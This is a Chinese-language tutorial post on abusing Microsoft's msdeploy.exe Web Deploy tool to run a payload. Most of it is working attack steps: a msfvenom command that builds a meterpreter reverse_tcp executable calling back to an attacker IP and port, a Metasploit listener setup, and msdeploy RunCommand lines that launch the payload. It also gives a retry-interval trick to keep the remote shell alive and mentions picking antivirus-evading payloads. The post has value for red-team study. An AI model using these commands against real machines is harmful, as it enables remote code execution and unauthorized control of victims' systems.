当你的才华
还撑不起你的野心时
那你就应该静下心来学习
目录
0x01 msdeloy.exe介绍
msdeploy.exe是微软提供的web部署命令行工具,通过它可以方便的部署web应用、数据库等,路径在C:\Program Files\IIS\Microsoft Web Deploy V3。msdeloy.exe可以使IIS可以在本地或远程同步,打包和部署Web应用程序,网站或Web服务器内容和配置。它具有众多功能,这些功能可以高度精确地包括要处理的那些组件,并排除那些不需要的组件。为了能够使用Web Deploy,必须已在源计算机和目标计算机上安装IIS。
msdeloy的命令参数繁杂,想要通过msdelopy来执行payload我们需要了解以下的几个参数:
-verb:<verbName>:指定Web Deploy动作即需要对源对象或目标对象执行的操作。<verbName>必须为以下之一:delete,dump,getDependencies,getSystemInfo或sync。sync即synchronize(同步操作),需要指定源对象和目标对象。
-source:<provider>:指定动作参数的数据源。source是同步和转储操作的必需参数,但不是delete操作的必备参数。可以使用msdeploy.exe -source -help命令查看关于source参数帮助,其中有一RunCommand参数可以在调用同步时在目标运行命令。
-dest: <provider>:指定sync/delete操作的目的地。仅当指定了sync或delete动词时,-dest参数才是必需的。-dest参数所使用的<provider>程序、其路径和设置是与-source参数是一致的。0x02 msdeloy.exe执行payload
通过执行.exe文件执行payload,生成.exe木马文件的方式有很多种在实战中可以选择免杀效果较好的。为了方便演示直接使用msf生成的木马文件:
msfvenom -f exe -p windows/meterpreter/reverse_tcp lhost=192.168.19.146 lport=23333 > w_re.exemsf监听:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.19.146
set lport 23333
exploit复制文件到本地使用msdeploy执行:
msdeploy.exe -verb:sync -source:RunCommand -dest:Runcommand="C:\Program Files\IIS\Microsoft Web Deploy V3\w_re.exe"不添加执行重试间隔时间的情况下,该进程建立之后会中断重试,得到会话存活时间很短。
使用waitinterval参数指定较长的程序重试时间间隔,以得到稳定会话。
msdeploy.exe -verb:sync -source:RunCommand -dest:Runcommand="C:\Program Files\IIS\Microsoft Web Deploy V3\w_re.exe",waitinterval=15000000开启火绒和360的情况下会报警并清除木马文件:
使用virustotal.com检查:由于使用msfvenom原生木马,查杀率相当感人:
参考资料:
lolbas-msdploy:https://lolbas-project.github.io/lolbas/OtherMSBinaries/Msdeploy/#awl%20bypass
微软mesdploy文档:https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-R2-and-2008/ee619740%28v%3dws.10%29
msdeploy-runcommand参数文档:https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-R2-and-2008/ee619740%28v%3dws.10%29
虽然我们生活在阴沟里,但依然有人仰望星空!